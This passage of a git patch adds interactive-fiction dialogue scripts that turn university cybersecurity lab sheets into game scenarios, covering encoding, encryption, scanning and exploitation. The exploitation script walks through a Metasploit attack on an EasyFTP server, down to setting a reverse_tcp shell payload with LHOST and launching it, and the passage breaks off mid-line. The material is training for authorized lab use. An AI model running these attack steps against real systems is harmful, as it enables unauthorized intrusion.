From e46d8544a21befa855be9218be2c979ccd8addd8 Mon Sep 17 00:00:00 2001 From: "Z. Cliffe Schreuders" Date: Wed, 19 Nov 2025 18:24:26 +0000 Subject: [PATCH] feat: Create game scenarios directory with lab sheet copies and dead drop system - Copy all lab sheets to game_scenarios/ for narrative conversion - Add dead_drop_system.ink explaining ENTROPY's flag-based communication - Prepare for converting educational labs into game challenges --- .../ink/game_scenarios/dead_drop_system.ink | 30 + .../game_scenarios/encoding_encryption.ink | 417 +++++++ .../ink/game_scenarios/exploitation.ink | 893 +++++++++++++++ .../ink/game_scenarios/feeling_blu_ctf.ink | 598 ++++++++++ .../ink/game_scenarios/intro_linux.ink | 942 +++++++++++++++ .../ink/game_scenarios/malware_metasploit.ink | 654 +++++++++++ .../phishing_social_engineering.ink | 967 ++++++++++++++++ .../ink/game_scenarios/post_exploitation.ink | 906 +++++++++++++++ story_design/ink/game_scenarios/scanning.ink | 1008 +++++++++++++++++ .../vulnerabilities_exploits.ink | 750 ++++++++++++ .../game_scenarios/vulnerability_analysis.ink | 562 +++++++++ 11 files changed, 7727 insertions(+) create mode 100644 story_design/ink/game_scenarios/dead_drop_system.ink create mode 100644 story_design/ink/game_scenarios/encoding_encryption.ink create mode 100644 story_design/ink/game_scenarios/exploitation.ink create mode 100644 story_design/ink/game_scenarios/feeling_blu_ctf.ink create mode 100644 story_design/ink/game_scenarios/intro_linux.ink create mode 100644 story_design/ink/game_scenarios/malware_metasploit.ink create mode 100644 story_design/ink/game_scenarios/phishing_social_engineering.ink create mode 100644 story_design/ink/game_scenarios/post_exploitation.ink create mode 100644 story_design/ink/game_scenarios/scanning.ink create mode 100644 story_design/ink/game_scenarios/vulnerabilities_exploits.ink create mode 100644 story_design/ink/game_scenarios/vulnerability_analysis.ink diff --git a/story_design/ink/game_scenarios/dead_drop_system.ink b/story_design/ink/game_scenarios/dead_drop_system.ink new file mode 100644 index 0000000..19a2cba --- /dev/null +++ b/story_design/ink/game_scenarios/dead_drop_system.ink @@ -0,0 +1,30 @@ +// ENTROPY Dead Drop Communication System +// Reusable explanation for game scenarios + +=== haxolottle_explains_dead_drops === +Haxolottle: Let me tell you about ENTROPY's communication method, little axolotl. + +Haxolottle: They don't use email or phones - too easy to intercept. Instead, they use "dead drops." + +Haxolottle: They hide encoded messages in compromised systems as flag strings. + +Haxolottle: When you see flag{distcc_backdoor_active}, that's not just a trophy. It's a signal. + +Haxolottle: It tells the next operative: "This system is compromised and ready for the next phase." + ++ [So flags are coordination signals?] + Haxolottle: Exactly! And here's the beautiful part - they're hiding in plain sight. + Haxolottle: To most people, flag{...} looks like a CTF artifact, test data, developer placeholder. + Haxolottle: But to ENTROPY, it's operational communication. + -> explain_extraction + += explain_extraction +Haxolottle: Your job is to intercept these dead drops before the next ENTROPY operative finds them. + +Haxolottle: Extract the flag, and their coordination breaks down. + +Haxolottle: Plus, we can analyze the message format to understand their operational timeline. + ++ [I'll intercept every message.] + Haxolottle: That's the spirit! Break their communication chain. + -> DONE diff --git a/story_design/ink/game_scenarios/encoding_encryption.ink b/story_design/ink/game_scenarios/encoding_encryption.ink new file mode 100644 index 0000000..2e8fb95 --- /dev/null +++ b/story_design/ink/game_scenarios/encoding_encryption.ink @@ -0,0 +1,417 @@ +// =========================================== +// CRYPTOGRAPHY LAB: ENCODING AND ENCRYPTION +// Introduction to Cryptography +// =========================================== +// Game-Based Learning replacement for lab sheet +// Original: cyber_security_landscape/4_encoding_encryption.md +// =========================================== + +// Global persistent state +VAR instructor_rapport = 0 + +// External variables +EXTERNAL player_name + +// =========================================== +// ENTRY POINT +// =========================================== + +=== start === +Crypto Instructor: Welcome to Cryptography Fundamentals, Agent {player_name}. + +Crypto Instructor: Today we're covering encoding and encryption - two concepts that sound similar but serve very different purposes. + +Crypto Instructor: You'll learn about encoding schemes like Base64 and hexadecimal, symmetric encryption with AES and DES, and asymmetric cryptography with GPG. + +Crypto Instructor: These skills are essential for any security professional. Let's begin. + +-> crypto_hub + +// =========================================== +// MAIN HUB +// =========================================== + +=== crypto_hub === +Crypto Instructor: What would you like to explore? + ++ [Encoding vs Encryption - what's the difference?] + -> encoding_vs_encryption ++ [Character encoding and ASCII] + -> character_encoding ++ [Hexadecimal and Base64] + -> hex_and_base64 ++ [Symmetric key encryption] + -> symmetric_encryption ++ [Public key cryptography] + -> public_key_crypto ++ [OpenSSL tools and commands] + -> openssl_tools ++ [GPG key management] + -> gpg_intro ++ [Show me the commands reference] + -> commands_reference ++ [I'm ready for the practical challenges] + -> ready_for_practice ++ [That's all for now] + #exit_conversation + -> END + +// =========================================== +// ENCODING VS ENCRYPTION +// =========================================== + +=== encoding_vs_encryption === +~ instructor_rapport += 5 + +Crypto Instructor: Excellent starting point. These terms get confused constantly. + +Crypto Instructor: **Encoding** transforms data into a different format using a publicly known, reversible scheme. Anyone can decode it - no secret required. + +Crypto Instructor: **Encryption** transforms data into a format readable only with a key or password. Without the key, the data is protected. + +Crypto Instructor: Think of it this way: encoding is like translating a book to a different language. Anyone with the right dictionary can read it. Encryption is like using a secret cipher - only those with the key can decode it. + +* [Why use encoding if it's not secure?] + ~ instructor_rapport += 8 + You: If encoding doesn't provide security, why use it? + Crypto Instructor: Compatibility and efficiency. Base64, for instance, lets you safely transmit binary data over text-only protocols like email. Hexadecimal makes binary data human-readable for debugging. + Crypto Instructor: Encoding solves technical problems. Encryption solves security problems. Different tools for different jobs. +* [Can you give examples of each?] + You: What are common examples of encoding and encryption? + Crypto Instructor: Encoding: Base64, hexadecimal, ASCII, URL encoding. Used for data representation. + Crypto Instructor: Encryption: AES, RSA, DES. Used for data protection. + Crypto Instructor: If you find Base64 data, don't assume it's encrypted - it's just encoded. Trivial to reverse. +* [Got it] + You: Clear distinction. +- -> crypto_hub + +// =========================================== +// CHARACTER ENCODING +// =========================================== + +=== character_encoding === +~ instructor_rapport += 5 + +Crypto Instructor: Let's start with the basics - how computers represent text. + +Crypto Instructor: ASCII - American Standard Code for Information Interchange. Maps characters to numbers. For example, "hello!" is: +- Decimal: 104 101 108 108 111 33 +- Hex: 68 65 6c 6c 6f 21 +- Binary: 01101000 01100101 01101100 01101100 01101111 00100001 + +Crypto Instructor: All the same data, just different representations. + +* [Why multiple representations?] + ~ instructor_rapport += 8 + You: Why do we need so many ways to represent the same thing? + Crypto Instructor: Context. Humans read decimal. Computers process binary. Hex is compact for humans to read binary - two hex digits per byte. + Crypto Instructor: Choose the representation that fits your needs. Debugging network traffic? Hex. Mathematical operations? Decimal. Actual processing? Binary. +* [Tell me about Unicode] + You: How does Unicode fit in? + Crypto Instructor: ASCII is 7-bit, covers English characters. Unicode extends this to support every language, emoji, symbols. + Crypto Instructor: UTF-8 is the dominant Unicode encoding - backward-compatible with ASCII, supports international characters efficiently. + Crypto Instructor: Most modern systems use UTF-8 by default. +* [Show me practical commands] + You: What commands convert between these formats? + Crypto Instructor: `xxd` is your friend. Try: + - `echo hello! | xxd` for hex output + - `echo hello! | xxd -b` for binary + - `echo 68656c6c6f21 | xxd -r -p` to convert hex back to text + Crypto Instructor: Python's also excellent: `"hello!".encode().hex()` gets you hex. +- -> crypto_hub + +// =========================================== +// HEX AND BASE64 +// =========================================== + +=== hex_and_base64 === +~ instructor_rapport += 5 + +Crypto Instructor: Two encoding schemes you'll encounter constantly: hexadecimal and Base64. + +Crypto Instructor: **Hexadecimal**: Base-16. Uses 0-9 and a-f. Two hex characters per byte. Compact, human-readable representation of binary data. + +Crypto Instructor: **Base64**: Uses A-Z, a-z, 0-9, +, /, and = for padding. More efficient than hex for transmitting binary data. Four characters represent three bytes. + +* [When do I use Base64 vs hex?] + ~ instructor_rapport += 10 + You: How do I choose between Base64 and hex? + Crypto Instructor: Base64 when efficiency matters - 33% overhead vs 100% for hex. Common in web protocols, email attachments, JSON/XML with binary data. + Crypto Instructor: Hex when human readability and debugging matter. Easier to spot patterns, map directly to bytes. + Crypto Instructor: In CTFs and forensics? You'll see both constantly. Learn to recognize them on sight. +* [Show me Base64 commands] + You: Walk me through Base64 encoding. + Crypto Instructor: Simple: `echo "text" | base64` encodes. `echo "encoded" | base64 -d` decodes. + Crypto Instructor: Try this chain: `echo "Valhalla" | base64 | xxd -p | xxd -r -p | base64 -d` + Crypto Instructor: You're encoding to Base64, converting to hex, converting back, decoding Base64. Should get "Valhalla" back. Demonstrates reversibility. +* [How do I recognize Base64?] + You: How can I identify Base64 when I see it? + Crypto Instructor: Look for: alphanumeric characters, sometimes with + and /, often ending in = or ==. + Crypto Instructor: Length is always multiple of 4 (due to padding). + Crypto Instructor: Classic tell: mix of uppercase, lowercase, and numbers, ending in equals signs. + Crypto Instructor: Example: `VmFsaGFsbGEK` - that's Base64. +- -> crypto_hub + +// =========================================== +// SYMMETRIC ENCRYPTION +// =========================================== + +=== symmetric_encryption === +~ instructor_rapport += 5 + +Crypto Instructor: Symmetric encryption - the same key encrypts and decrypts. Fast, efficient, but has a key distribution problem. + +Crypto Instructor: Two main algorithms you'll use: DES and AES. + +* [Tell me about DES] + You: What's DES? + -> des_explanation +* [Tell me about AES] + You: What's AES? + -> aes_explanation +* [What's the key distribution problem?] + ~ instructor_rapport += 10 + You: You mentioned a key distribution problem? + Crypto Instructor: The fundamental challenge of symmetric crypto: how do you securely share the key? + Crypto Instructor: If you encrypt a message with AES, your recipient needs the same key to decrypt. How do you get them the key without an attacker intercepting it? + Crypto Instructor: This is where public key crypto comes in - or secure key exchange protocols like Diffie-Hellman. + -> symmetric_encryption +* [Back to main menu] + -> crypto_hub + +=== des_explanation === +~ instructor_rapport += 5 + +Crypto Instructor: DES - Data Encryption Standard. Developed by IBM in the 1970s, based on Feistel ciphers. + +Crypto Instructor: 56-bit key size. Small by modern standards - brute-forceable in reasonable time with modern hardware. + +Crypto Instructor: Historical importance, but don't use it for real security anymore. Superseded by AES. + +Crypto Instructor: OpenSSL command: `openssl enc -des-cbc -pbkdf2 -in file.txt -out file.enc` + +* [Why is 56-bit insufficient?] + ~ instructor_rapport += 8 + You: Why is 56 bits too small? + Crypto Instructor: 2^56 possible keys - about 72 quadrillion. Sounds large, but modern systems can test millions or billions of keys per second. + Crypto Instructor: DES was cracked in less than 24 hours in 1999. Hardware has only improved since then. + Crypto Instructor: Compare to AES-256: 2^256 keys. Astronomically larger. Not brute-forceable with current or foreseeable technology. +* [Show me the decryption command] + You: How do I decrypt DES-encrypted data? + Crypto Instructor: `openssl enc -des-cbc -d -in file.enc -out decrypted.txt` + Crypto Instructor: The `-d` flag specifies decryption. You'll be prompted for the password. + Crypto Instructor: Note: password and key aren't quite the same. The password is hashed with PBKDF2 to derive the actual encryption key. +- -> symmetric_encryption + +=== aes_explanation === +~ instructor_rapport += 5 + +Crypto Instructor: AES - Advanced Encryption Standard. The modern symmetric encryption standard. + +Crypto Instructor: 128-bit block cipher. Key sizes: 128, 192, or 256 bits. Uses substitution-permutation network - combination of substitution, permutation, mixing, and key addition. + +Crypto Instructor: Fast, secure, widely supported. This is what you should be using for symmetric encryption. + +* [How much stronger is AES than DES?] + ~ instructor_rapport += 10 + You: Quantify the security improvement over DES. + Crypto Instructor: DES: 2^56 keyspace. AES-128: 2^128. AES-256: 2^256. + Crypto Instructor: AES-128 has 2^72 times more keys than DES. AES-256 has 2^200 times more keys than AES-128. + Crypto Instructor: To put it in perspective: if you could test a trillion trillion keys per second, AES-256 would still take longer than the age of the universe to brute force. + Crypto Instructor: Practical attacks on AES focus on implementation flaws, side channels, or compromising the key - not brute forcing. +* [Show me AES commands] + You: Walk me through AES encryption. + Crypto Instructor: Encrypt: `openssl enc -aes-256-cbc -pbkdf2 -in file.txt -out file.enc` + Crypto Instructor: Decrypt: `openssl enc -aes-256-cbc -d -in file.enc -out file.txt` + Crypto Instructor: You can use -aes-128-cbc, -aes-192-cbc, or -aes-256-cbc depending on key size. + Crypto Instructor: CBC mode is Cipher Block Chaining. ECB mode also available but has security weaknesses - avoid for real use. +* [What's CBC mode?] + ~ instructor_rapport += 8 + You: Explain CBC mode. + Crypto Instructor: Cipher Block Chaining. Each block of plaintext is XORed with the previous ciphertext block before encryption. + Crypto Instructor: This means identical plaintext blocks produce different ciphertext - hides patterns. + Crypto Instructor: ECB (Electronic Codebook) encrypts each block independently - same input always produces same output. Leaks pattern information. + Crypto Instructor: Always use CBC or more modern modes like GCM. Never use ECB for real data. +- -> symmetric_encryption + +// =========================================== +// PUBLIC KEY CRYPTOGRAPHY +// =========================================== + +=== public_key_crypto === +~ instructor_rapport += 5 + +Crypto Instructor: Asymmetric cryptography. Revolutionary concept - separate keys for encryption and decryption. + +Crypto Instructor: **Public key**: shared freely. Anyone can use it to encrypt messages to you. +**Private key**: kept secret. Only you can decrypt messages encrypted with your public key. + +Crypto Instructor: Solves the key distribution problem. You can publish your public key openly - doesn't compromise security. + +* [How does this actually work?] + ~ instructor_rapport += 10 + You: What's the underlying mechanism? + Crypto Instructor: Mathematics - specifically, functions that are easy to compute in one direction but extremely hard to reverse without special information. + Crypto Instructor: RSA uses factoring large prime numbers. Easy to multiply two huge primes, nearly impossible to factor the result back without knowing the primes. + Crypto Instructor: Your private key contains the primes. Your public key contains their product. Encryption uses the product, decryption needs the primes. + Crypto Instructor: Full math is beyond this course, but that's the essence. One-way mathematical trap doors. +* [What's the downside?] + ~ instructor_rapport += 8 + You: This sounds perfect. What's the catch? + Crypto Instructor: Performance. Asymmetric crypto is much slower than symmetric. + Crypto Instructor: Typical use: asymmetric crypto to exchange a symmetric key, then symmetric crypto for actual data. + Crypto Instructor: TLS/SSL does exactly this - RSA or ECDH to agree on a session key, then AES to encrypt the connection. + Crypto Instructor: Hybrid approach gets security of asymmetric with performance of symmetric. +* [Tell me about GPG] + You: How does GPG fit into this? + Crypto Instructor: GPG - GNU Privacy Guard. Open source implementation of PGP (Pretty Good Privacy). + Crypto Instructor: Provides public-key crypto for email encryption, file encryption, digital signatures. + Crypto Instructor: Industry standard for email security and file protection. + -> gpg_intro +- -> crypto_hub + +// =========================================== +// OPENSSL TOOLS +// =========================================== + +=== openssl_tools === +~ instructor_rapport += 5 + +Crypto Instructor: OpenSSL - the Swiss Army knife of cryptography. + +Crypto Instructor: It's a toolkit implementing SSL/TLS protocols and providing cryptographic functions. Command-line tool plus libraries. + +Crypto Instructor: Can do: key generation, encryption, decryption, hashing, certificate management, SSL/TLS testing, and much more. + +* [Show me useful commands] + You: What are the most useful OpenSSL commands? + Crypto Instructor: List available ciphers: `openssl list -cipher-algorithms` + Crypto Instructor: Generate hash: `echo "data" | openssl dgst -sha256` + Crypto Instructor: Encrypt file: `openssl enc -aes-256-cbc -in file -out file.enc` + Crypto Instructor: Check certificate: `openssl x509 -in cert.pem -text -noout` + Crypto Instructor: Test SSL connection: `openssl s_client -connect example.com:443` + Crypto Instructor: Generate random bytes: `openssl rand -hex 32` +* [Tell me about the 2014 vulnerability] + ~ instructor_rapport += 15 + You: You mentioned a major OpenSSL vulnerability in 2014? + Crypto Instructor: Heartbleed. CVE-2014-0160. One of the most significant security flaws in internet history. + Crypto Instructor: Bug in OpenSSL's implementation of TLS heartbeat extension. Allowed attackers to read server memory - including private keys, passwords, session tokens. + Crypto Instructor: Affected two-thirds of web servers. Required widespread patching and certificate replacement. + Crypto Instructor: Important lesson: even cryptographic implementations can have bugs. The algorithms (AES, RSA) were fine - the implementation was flawed. + Crypto Instructor: This is why: keep software updated, use well-audited libraries, implement defense in depth. +* [How do I check OpenSSL version?] + You: How do I know what version I'm running? + Crypto Instructor: `openssl version -a` shows version and build details. + Crypto Instructor: Post-Heartbleed, you want OpenSSL 1.0.1g or later, or 1.0.2 series. + Crypto Instructor: Most modern systems use OpenSSL 1.1.1 or 3.x now. +- -> crypto_hub + +// =========================================== +// GPG INTRODUCTION +// =========================================== + +=== gpg_intro === +~ instructor_rapport += 5 + +Crypto Instructor: GPG - GNU Privacy Guard. Open-source public-key cryptography and signing tool. + +Crypto Instructor: Core concepts: key pairs (public and private), encryption, decryption, signing, verification. + +* [Walk me through key generation] + You: How do I create GPG keys? + Crypto Instructor: `gpg --gen-key` starts the process. You'll provide name, email, passphrase. + Crypto Instructor: This creates a key pair. Public key you share, private key you protect. + Crypto Instructor: The passphrase protects your private key - don't forget it! Without it, your private key is useless. +* [How do I share my public key?] + You: How do others get my public key? + Crypto Instructor: Export it: `gpg --export -a "Your Name" > public.key` + Crypto Instructor: This creates ASCII-armored public key file. Share it via email, website, key server. + Crypto Instructor: Recipients import it: `gpg --import public.key` + Crypto Instructor: Now they can encrypt messages only you can read. +* [Encrypting and decrypting] + You: Show me the encryption workflow. + Crypto Instructor: Encrypt: `gpg -e -r "Recipient Name" file.txt` creates file.txt.gpg + Crypto Instructor: Decrypt: `gpg -d file.txt.gpg > decrypted.txt` + Crypto Instructor: Recipient's public key must be in your keyring to encrypt for them. + Crypto Instructor: Your private key must be available to decrypt messages to you. +* [What about digital signatures?] + ~ instructor_rapport += 10 + You: How do signatures work? + Crypto Instructor: Signatures prove a message came from you and wasn't modified. + Crypto Instructor: Sign: `gpg -s file.txt` - creates file.txt.gpg with signature + Crypto Instructor: Verify: `gpg --verify file.txt.gpg` - confirms signature and shows signer + Crypto Instructor: Uses your private key to sign, others use your public key to verify. Reverse of encryption. + Crypto Instructor: Provides authenticity and integrity - critical for software distribution, secure communications. +- -> crypto_hub + +// =========================================== +// COMMANDS REFERENCE +// =========================================== + +=== commands_reference === +Crypto Instructor: Quick reference for the commands we've covered: + +Crypto Instructor: **Encoding:** +- Hex: `echo "text" | xxd -p` (encode), `echo "hex" | xxd -r -p` (decode) +- Base64: `echo "text" | base64` (encode), `echo "b64" | base64 -d` (decode) +- View as binary: `xxd -b file` + +Crypto Instructor: **Symmetric Encryption (OpenSSL):** +- AES encrypt: `openssl enc -aes-256-cbc -pbkdf2 -in file -out file.enc` +- AES decrypt: `openssl enc -aes-256-cbc -d -in file.enc -out file.txt` +- DES encrypt: `openssl enc -des-cbc -pbkdf2 -in file -out file.enc` +- List ciphers: `openssl list -cipher-algorithms` + +Crypto Instructor: **Public Key Crypto (GPG):** +- Generate keys: `gpg --gen-key` +- List keys: `gpg --list-keys` +- Export public: `gpg --export -a "Name" > public.key` +- Import key: `gpg --import key.asc` +- Encrypt: `gpg -e -r "Recipient" file` +- Decrypt: `gpg -d file.gpg` +- Sign: `gpg -s file` +- Verify: `gpg --verify file.gpg` + +Crypto Instructor: **Useful OpenSSL:** +- Hash: `openssl dgst -sha256 file` +- Random data: `openssl rand -hex 32` +- Version: `openssl version` + ++ [Back to main menu] + -> crypto_hub + +// =========================================== +// READY FOR PRACTICE +// =========================================== + +=== ready_for_practice === +Crypto Instructor: Excellent. You've covered the fundamentals. + +Crypto Instructor: In your VM's home directory, you'll find CTF challenges testing these skills: +- Decoding various encoded data +- Decrypting symmetrically-encrypted files +- Using GPG for secure communication +- Breaking weak encryption + +Crypto Instructor: Practical tips: + +Crypto Instructor: **Recognize encoding schemes on sight**: Base64 ends in =, hex is 0-9 and a-f, binary is only 0 and 1. + +Crypto Instructor: **Try obvious passwords first**: "password", "admin", "123456". Weak keys are common. + +Crypto Instructor: **Check file headers**: `file` command identifies file types even if extension is wrong. Encoded/encrypted data looks like random bytes. + +Crypto Instructor: **Use CyberChef for quick analysis**: Web tool that chains encoding/decoding operations. Great for CTFs. + +Crypto Instructor: **Document what you try**: When attempting decryption, track what keys/methods you've tested. Easy to lose track. + +{instructor_rapport >= 50: + Crypto Instructor: You've asked excellent questions and engaged deeply with the material. You're well-prepared. +} + +Crypto Instructor: Remember: encoding is reversible with no secret. Encryption requires keys. Symmetric uses same key for both. Asymmetric uses key pairs. + +Crypto Instructor: Now go break some crypto challenges. Good luck, Agent {player_name}. + +#exit_conversation +-> END diff --git a/story_design/ink/game_scenarios/exploitation.ink b/story_design/ink/game_scenarios/exploitation.ink new file mode 100644 index 0000000..cf5056a --- /dev/null +++ b/story_design/ink/game_scenarios/exploitation.ink @@ -0,0 +1,893 @@ +// From Scanning to Exploitation Lab Sheet +// Based on HacktivityLabSheets: introducing_attacks/6_exploitation.md +// Author: Z. Cliffe Schreuders, Anatoliy Gorbenko, Tom Shaw, Thalita Vergilio +// License: CC BY-SA 4.0 + +// Global persistent state +VAR instructor_rapport = 0 +VAR exploitation_mastery = 0 + +// External variables +EXTERNAL player_name + +=== start === +Exploitation Specialist: Welcome back, Agent {player_name}. I'm your instructor for Advanced Exploitation Techniques. + +~ instructor_rapport = 0 +~ exploitation_mastery = 0 + +Exploitation Specialist: This lab brings together everything you've learned so far - scanning, vulnerability research, and exploitation. + +Exploitation Specialist: You'll learn how to move from network scanning to identifying vulnerabilities, searching for exploits, and ultimately gaining control of target systems. + +Exploitation Specialist: We'll use both Metasploit console and Armitage, a graphical interface that can automate parts of the hacking process. + +Exploitation Specialist: Remember: this knowledge is for authorized penetration testing and defensive security only. + +~ exploitation_mastery += 10 + +-> exploitation_hub + +=== exploitation_hub === +Exploitation Specialist: What aspect of exploitation would you like to explore? + ++ [Why combine scanning and exploitation?] + -> scanning_to_exploitation ++ [Scanning targets with Nmap] + -> nmap_scanning ++ [Metasploit database and scan import] + -> metasploit_database ++ [Running scans from within msfconsole] + -> msfconsole_scanning ++ [Searching for Metasploit exploits] + -> searching_exploits ++ [Launching Metasploit exploits] + -> launching_exploits ++ [Introduction to Armitage] + -> armitage_intro ++ [Using Armitage for automated hacking] + -> armitage_usage ++ [Vulnerability databases and research] + -> vulnerability_databases ++ [The Exploit Database and searchsploit] + -> exploit_db ++ [Show me the commands reference] + -> commands_reference ++ [Practical challenge tips] + -> challenge_tips ++ [I'm ready for the lab exercises] + -> ready_for_practice ++ [That's all for now] + #exit_conversation + -> END + +=== scanning_to_exploitation === +Exploitation Specialist: After gathering information about a target through footprinting and scanning, you need to know what attacks will work. + +~ instructor_rapport += 5 + +Exploitation Specialist: The key questions are: Where will you find vulnerability information? How will you use that information to launch an attack? How can security professionals use this to test system security? + +Exploitation Specialist: Once you know the operating system and software running on a system, you can refer to your own knowledge of known vulnerabilities, or search online databases for more extensive information. + ++ [What makes a target exploitable?] + Exploitation Specialist: A target is exploitable when it's running vulnerable software that you have an exploit for. + + Exploitation Specialist: For example, if a target is running an old version of Windows with known vulnerabilities, there are numerous exploits that could give you full control of the system. + + Exploitation Specialist: The scanning phase reveals what's running. The vulnerability research phase identifies what's vulnerable. The exploitation phase is when you actually attack. + + ~ instructor_rapport += 5 + ++ [How do I know what attacks will work?] + Exploitation Specialist: This is where vulnerability databases and exploit frameworks like Metasploit come in. + + Exploitation Specialist: After scanning reveals "Windows 2000 with EasyFTP 1.7.0.11," you can search for known vulnerabilities in those specific versions. + + Exploitation Specialist: Metasploit has over a thousand exploits built in. You can search them by platform, service name, or CVE number. + + Exploitation Specialist: We'll also look at external databases like CVE Details, NVD, and Exploit DB. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== nmap_scanning === +Exploitation Specialist: The first step is thorough scanning to identify your targets and what they're running. + +~ instructor_rapport += 5 + +Exploitation Specialist: For this lab, you'll scan your network to find two vulnerable servers - one Linux and one Windows. + +Exploitation Specialist: A comprehensive scan would be: nmap -sV 10.X.X.2-3 + +Exploitation Specialist: Where X.X are the second and third octets of your Kali VM's IP address. + ++ [What should I look for in the scan results?] + Exploitation Specialist: Pay attention to several key pieces of information: + + Exploitation Specialist: First, the IP addresses - which host is Linux and which is Windows? + + Exploitation Specialist: Second, what services are running - HTTP, FTP, SSH, IRC? + + Exploitation Specialist: Third, and most importantly, what specific software versions are running. For example: "vsftpd 2.3.4" or "EasyFTP 1.7.0.11" + + Exploitation Specialist: Those specific version numbers are critical for finding applicable exploits. + + ~ instructor_rapport += 5 + ++ [What if the scan takes too long?] + Exploitation Specialist: Windows scans can take several minutes to complete - this is normal. + + Exploitation Specialist: If you want faster results, you can skip OS detection or scan fewer ports. + + Exploitation Specialist: However, for thorough penetration testing, patience is important. You don't want to miss a vulnerable service on an unusual port. + + ~ instructor_rapport += 5 + ++ [What if nmap shows ftp with a question mark?] + Exploitation Specialist: If you see "ftp?" in the results, it means Nmap isn't confident about the service identification. + + Exploitation Specialist: This can happen if the service is slow to respond or behaving unusually. + + Exploitation Specialist: Try restarting the Windows server and scanning again. The service should respond properly after a fresh start. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== metasploit_database === +Exploitation Specialist: Metasploit includes a PostgreSQL database that stores information about hosts, services, and vulnerabilities. + +~ instructor_rapport += 5 + +Exploitation Specialist: This database integration is extremely powerful - it lets you import scan results and automatically target vulnerable services. + +Exploitation Specialist: Before using the database, you need to initialize it and start PostgreSQL. + ++ [How do I initialize the Metasploit database?] + Exploitation Specialist: First, reinitialize the database: sudo msfdb reinit + + Exploitation Specialist: Then start PostgreSQL: sudo service postgresql start + + Exploitation Specialist: These commands set up the database that Metasploit will use to store scan results and track compromised hosts. + + Exploitation Specialist: You only need to do this once per session, or after restarting your Kali VM. + + ~ instructor_rapport += 5 + ++ [How do I import Nmap scan results?] + Exploitation Specialist: If you've saved Nmap results in XML format, you can import them: + + Exploitation Specialist: From msfconsole, run: db_import scan_output.xml + + Exploitation Specialist: Metasploit will parse the XML and populate the database with host and service information. + + Exploitation Specialist: You can then query this data with commands like "hosts" and "services" + + ~ instructor_rapport += 5 + ++ [What can I do with the database?] + Exploitation Specialist: Once data is in the database, you can query it intelligently: + + Exploitation Specialist: "hosts" shows all discovered hosts and their operating systems. + + Exploitation Specialist: "services" shows all discovered services across all hosts. + + Exploitation Specialist: "services -p 21" shows only services on port 21 (FTP). + + Exploitation Specialist: "services -p 21 -R" does the same AND automatically sets RHOSTS to target those services! + + Exploitation Specialist: This integration makes targeting much more efficient. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== msfconsole_scanning === +Exploitation Specialist: You can run scans directly from within msfconsole - you don't always need a separate terminal. + +~ instructor_rapport += 5 + +Exploitation Specialist: Msfconsole can run Bash commands, so you can run Nmap directly: msf > nmap -O -sV TARGET + +Exploitation Specialist: Even better, you can use db_nmap which scans AND automatically imports results into the database. + ++ [What's the difference between nmap and db_nmap?] + Exploitation Specialist: When you run "nmap" from msfconsole, it just executes Nmap normally. You'd need to manually import the results. + + Exploitation Specialist: When you run "db_nmap", it does the same scan BUT automatically imports results into the Metasploit database. + + Exploitation Specialist: For example: msf > db_nmap -O -sV -p 1-65535 TARGET + + Exploitation Specialist: This scans all ports with OS and version detection, and the results are immediately available via "hosts" and "services" + + ~ instructor_rapport += 5 + ++ [Does Metasploit have its own scanners?] + Exploitation Specialist: Yes! Metasploit has various port scanning modules, though they're not as feature-complete as Nmap. + + Exploitation Specialist: You can see them with: use auxiliary/scanner/portscan/ (then press TAB) + + Exploitation Specialist: For a basic TCP connect scan: use auxiliary/scanner/portscan/tcp + + Exploitation Specialist: These modules integrate directly with the database and can use multiple threads for faster scanning. + + ~ instructor_rapport += 5 + ++ [How do I use Metasploit's port scanner?] + Exploitation Specialist: First, select the module: use auxiliary/scanner/portscan/tcp + + Exploitation Specialist: Set the target: set RHOSTS TARGET_IP + + Exploitation Specialist: Optionally speed it up: set THREADS 10 + + Exploitation Specialist: Then run it: run + + Exploitation Specialist: Results are automatically stored in the database. You can verify with the "services" command. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== searching_exploits === +Exploitation Specialist: Metasploit's search command is incredibly powerful for finding relevant exploits. + +~ instructor_rapport += 5 + +Exploitation Specialist: You can search by platform, service name, CVE number, exploit type, and more. + +Exploitation Specialist: The basic syntax is: search + +Exploitation Specialist: But you can be much more specific with search operators. + ++ [What search operators are available?] + Exploitation Specialist: Here are the main search operators: + + Exploitation Specialist: type: - Specify module type (exploit, auxiliary, post) + + Exploitation Specialist: platform: - Specify platform (Windows, Linux, etc.) + + Exploitation Specialist: cve: - Search by CVE number + + Exploitation Specialist: name: - Search module names + + Exploitation Specialist: For example: search type:exploit platform:Windows + + Exploitation Specialist: Or: search type:exploit cve:2003-0352 + + ~ instructor_rapport += 5 + ++ [How do I search for specific software?] + Exploitation Specialist: Simply include the software name in the search: + + Exploitation Specialist: search easyftp + + Exploitation Specialist: search vsftpd + + Exploitation Specialist: search unreal + + Exploitation Specialist: Metasploit will search module names, descriptions, and references for matches. + + Exploitation Specialist: Look through the results for modules that match your target's version number. + + ~ instructor_rapport += 5 + ++ [Give me some search examples] + Exploitation Specialist: Sure! Here are useful searches: + + Exploitation Specialist: search type:exploit platform:linux + + Exploitation Specialist: search type:exploit cve:2018 + + Exploitation Specialist: search buffer overflow + + Exploitation Specialist: search type:exploit platform:Windows XP + + Exploitation Specialist: search IRC (to find IRC server exploits) + + Exploitation Specialist: Once you find a promising module, use "info exploit/path/to/module" to learn more about it. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== launching_exploits === +Exploitation Specialist: Once you've identified the right exploit module, launching it follows a standard workflow. + +~ instructor_rapport += 5 + +Exploitation Specialist: The process is: select the module, configure options, choose a payload, and launch the attack. + +Exploitation Specialist: Let's walk through a typical exploitation scenario. + ++ [Walk me through exploiting EasyFTP] + Exploitation Specialist: Let me guide you through the complete process: + + Exploitation Specialist: First, select the exploit: use exploit/windows/ftp/easyftp_cwd_fixret + + Exploitation Specialist: Check required options: show options + + Exploitation Specialist: Set the target: set RHOST TARGET_IP + + Exploitation Specialist: Choose a payload: set PAYLOAD windows/shell/reverse_tcp + + Exploitation Specialist: Set your IP for the reverse shell: set LHOST YOUR_KALI_IP + + Exploitation Specialist: Optionally check if it's vulnerable: check (though most don't support this) + + Exploitation Specialist: Launch the attack: exploit + + Exploitation Specialist: If successful, you'll get a shell on the target! + + ~ instructor_rapport += 5 + ++ [What payloads should I use?] + Exploitation Specialist: The payload depends on what you want to achieve and what the exploit supports. + + Exploitation 